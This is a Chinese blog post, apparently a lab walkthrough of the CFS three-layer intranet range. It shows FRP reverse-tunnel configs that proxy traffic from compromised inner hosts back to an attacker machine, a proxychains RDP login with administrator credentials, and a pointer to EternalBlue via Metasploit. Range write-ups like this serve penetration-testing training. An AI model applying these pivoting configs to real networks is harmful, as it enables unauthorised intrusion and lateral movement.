FRP反向隧道代理打CFS三层

于 2024-07-06 14:25:39 发布
阅读量245 收藏 4
点赞数 10
文章标签: 服务器 linux 网络 网络安全 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74171325/article/details/140225028
版权

目录

攻击机 

查看服务端frps.ini配置文件

开启服务端frps

蚁剑打目标机

        上传客户端frp到目标机

​frpc.ini文件配置成 

客户端打开代理frpc

vps显示成功客户端frpc打开

访问成功192.168.22.22的第二层内网主机

省去前面漏洞利用的rce过程,直接蚁剑开搞隧道代理

​一层内网主机上传个frps服务端去连接二层内网主机

一层内网主机客户端配置转发30000端口

二层内网主机客户端配置

​一层内网主机开启服务端​

二层内网主机开启客户端 

kali代理配置打 

​ 注意:这个地方要开启的是30000的proxychains去代理连接三层内网主机

成功连接,可以用proxychains利用msf的永恒之蓝打 

需要用到frp这款工具,后台私信我获取 

攻击机 

查看服务端frps.ini配置文件

[common]
bind_port = 7000
root@iZt4njbm6gjpckh0e72p0lZ:~/frp#

 

开启服务端frps

chmod u+x frps
./frps -c frps.ini   #开启frp

蚁剑打目标机

上传客户端frp到目标机

前面已将一层内网连接蚁剑的方式讲过,这篇frp的省去这个过程

chmod u+x frpc  #给个执行权限

 frpc.ini文件配置成 

解读代码,它会抓发流量到你的攻击机192.168.20.128:20000

[common]
server_addr = 192.168.20.128
server_port = 7000

[socks_proxy]
type=tcp
plugin=socks5
remote_port=20000

 客户端打开代理frpc

./frpc -c frpc.ini

vps显示成功客户端frpc打开

 配置浏览器代理

 访问成功192.168.22.22的第二层内网主机

省去前面漏洞利用的rce过程,直接蚁剑开搞隧道代理

 一层内网主机上传个frps服务端去连接二层内网主机

  一层内网主机客户端配置转发30000端口

[common]
server_addr = 192.168.20.128
server_port = 7000

[socks_proxy]
type=tcp
plugin=socks5
remote_port=20000

[portfwd]
type=tcp
local_ip=127.0.0.1
local_port=30000
remote_port=30000

 二层内网主机客户端配置

代码解读,二层内网主机连接一层的192.168.22.11:7000端口

[common]
server_addr = 192.168.22.11
server_port = 7000

[2_socks_proxy]
type=tcp
plugin=socks5
remote_port=30000

 一层内网主机开启服务端

二层内网主机开启客户端 

kali代理配置打 

 注意:这个地方要开启的是30000的proxychains去代理连接三层内网主机

proxychains rdesktop -u administrator -p root 192.168.33.33

成功连接,可以用proxychains利用msf的永恒之蓝打 

         吗喽crazy,欢迎来交流 

 

peiqi_crazy
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CFS.zip_CFS-GA_cfs
09-21
**CFS加密算法详解** CFS(Chaffing and Winnowing)是一种基于混沌理论的文件加密算法,由Stanford大学的John L. Hennessy和David A. Patterson提出。该算法结合了“Chaffing”(添加混淆数据)和“Winnowing”...
sched_fair.rar_batch_cfs
09-22
"Sched_fair.rar_batch_cfs" 提到的是完全公平调度器(Completely Fair Scheduler, CFS)中的两类任务调度策略:SCHED_NORMAL 和 SCHED_BATCH。这两个调度类在CFS框架下运行,确保系统资源的公平分配。 1. 完全公平...
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
3. **CFS三层内网漫游安全测试**:这是一个在CTF比赛中的场景,涉及多层内网和Web攻防。我们首先生成Linux后门,然后通过Metasploit框架接收反弹shell。利用获取的权限,收集网络信息,添加路由,开启Socks4a代理。...
CFS调度器(6)-总结.pdf
07-31
经过前面一系列的文章描述,我们已经对CFS调度器有了一定的认识。那么本篇文章就作为一篇总结和思考。我们就回忆一下CFS调度器的那些事。我们就以问题的形式重新回顾一遍CFS调度器设计的原理。现在开始,我们问题...
linux CFS调度以及load balance.pptx
02-24
Linux CFS 调度和 Load Balance Linux 操作系统中,CFS(Completely Fair Scheduler)是一种调度算法,用于管理系统中的进程调度。下面将详细介绍 CFS 调度和 Load Balance 相关知识点。 一、调度器 Scheduler 在...
免密ssh和自定义服务器名字【远程连接服务器
zik的博客
07-05 335
原理实现免密登录需要本地的公钥id_rsa.pub放在服务器上的 authorized_keys 文件中。服务器中的位置一般在~/.ssh.authorized_keys。若不存在,创建一个即可。注意 authorized_keys 文件的权限必须是600,如果权限不对会影响登录。本地生成公钥和私钥参数-t rsa表示使用rsa算法进行加密,执行后,会在当前用户/.ssh目录下找到id_rsa(私钥)和id_rsa.pub(公钥)正常情况下可以跳过上面的两个步骤。
Linux】TCP协议【下二】{流量控制/滑动窗口/延迟应答/捎带应答/拥塞控制}
A progressive ape!
07-02 1010
Linux】TCP协议【下二】{流量控制/滑动窗口/延迟应答/捎带应答/拥塞控制}
MQTT教程--服务器使用EMQX和客户端使用MQTTX
yoyo勰的博客
07-04 866
MQTT 是用于物联网连接的 OASIS 标准,它是一种基于发布订阅模式的、轻量级的消息传输协议,专为受限设备和低带宽、高延迟和不可靠的网络设计,并且能够提供一定的消息可靠性保证。得益于这些特性,MQTT 在车联网、工业制造、移动通信等领域广泛应用。目前 MQTT 的主要版本有 v3.1.1 和 v5.0,v5.0 于 2019 年 3 月发布,相比于 v3.1.1 引入了很多改进和增强,目前市面上绝大部分的客户端 和代理都已经支持了 MQTT v5.0。
centos服务器fail2ban部署指南标准流程
gallonyin的博客
07-03 250
Fail2Ban的默认配置文件在/etc/fail2ban/jail.conf,但不建议直接编辑这个文件。/etc/fail2ban/jail.local的优先级默认更高,无需指定路径。创建或编辑过滤器文件 /etc/fail2ban/filter.d/nginx-errors.conf,添4xx、5xx错误码。Fail2Ban会使用iptables来禁止IP地址。确保你的防火墙允许Fail2Ban添加规则。重启fail2ban生效。
【计算机网络】应用层(作业)
Elena's Blog
07-02 867
A。
X86和ARM架构的服务器 的区别
阿拉伯梳子的专栏
07-02 911
X86和ARM架构的服务器各有其优缺点,并适用于不同的应用场景。
项目一 nfs 共享服务器 Haproxy 代理 Keepalive 高可用集群
2401_84376072的博客
07-05 153
深入理解程序的数据存储 配置NFS服务器 配置ansible环境
如何在window 10 服务器上安装Git服务--Gitblit适合小团队
danielli的专栏
07-01 446
Windows Server上安装Git服务通常指的是安装一个可以被网络中的其他用户访问的Git服务器。Git本身是一个分布式版本控制系统,但是为了便于团队协作,通常会部署一个中心化的Git服务器,如GitLab、GitHub Enterprise、Gitea、Gitblit等。这里以Gitblit为例来说明如何在Windows Server上安装Git服务,因为Gitblit是一个轻量级且易于配置的Git服务器解决方案。
堆叠的作用
最新发布
陪我养猪吧的博客
07-05 419
传统的园区网络采用设备和链路冗余来保证高可靠性,但其链路利用率低、网络维护成本高,堆叠技术将多台交换机虚拟成一台交换机,达到简化网络部署和降低网络维护工作量的目的。
liunx清理服务器内存和日志
weixin_60948956的博客
07-05 123
然后再查看一下磁盘内存大小,再考虑是否清理其他日志。如果一个服务器上有多个服务,以此类推。
单线服务器有什么作用?
wanhengwangluo的博客
07-02 286
单线服务器是指只有一条物理线路可以接入的服务器,这表明所有的数据信息与用户的访问请求都只能通过这一条线路来进行传输,因此单线服务器服务器的性能与可扩展性方面有着一定的限制。对于一些小型企业网站和应用程序来说,单线服务器更加适合他们,是一种比较经济实惠且十分有效的选择,对于一些轻负载的应用程序来说,单线服务器就能够提供足够的性能,可以满足一些基本的要求。单线服务器与双线服务器相比,双线服务器能够使用多个逻辑线路来处理更多的数据和用户请求,更能提高服务器的性能与可靠性,那单线服务器具体有哪些作用呢?
服务器的分类,主流服务器的应用场景
Daylighte的博客
07-01 1213
主流服务器品牌如戴尔、惠普、联想、IBM、华为和浪潮等,各自拥有独特的产品线和优势,服务于不同的行业和应用场景。服务器的种类多样,每种服务器都有其特定的应用场景和优势。对于选择服务器的用户来说,了解这些分类有助于根据具体需求选择合适的服务器类型。这些厂商在全球市场中占有重要地位,提供了多样化的服务器产品和解决方案,满足不同行业和应用场景的需求。这些行业对计算速度、存储能力和网络处理能力有极高的要求,因此依赖高性能服务器来保障服务的稳定和用户体验。
MySQL/SqlServer 跨服务器 增删改查(CRUD) 的一种方法
天外有天,人外有人。 专注品质 不断创新 让精益求精成为习惯
07-02 465
SqlServer/MySQL 比较表或者查询结果 中每一个行/列 单元格 内容是否相同。
服务器-01-zabbix7.0搭建
weixin_43714208的博客
07-05 268
配置中文字符,可以在网上下载 微软雅黑.ttf,上传到服务器/usr/share/fonts/dejavu。在zabbix官网下载对应的rpm包。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

peiqi_crazy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值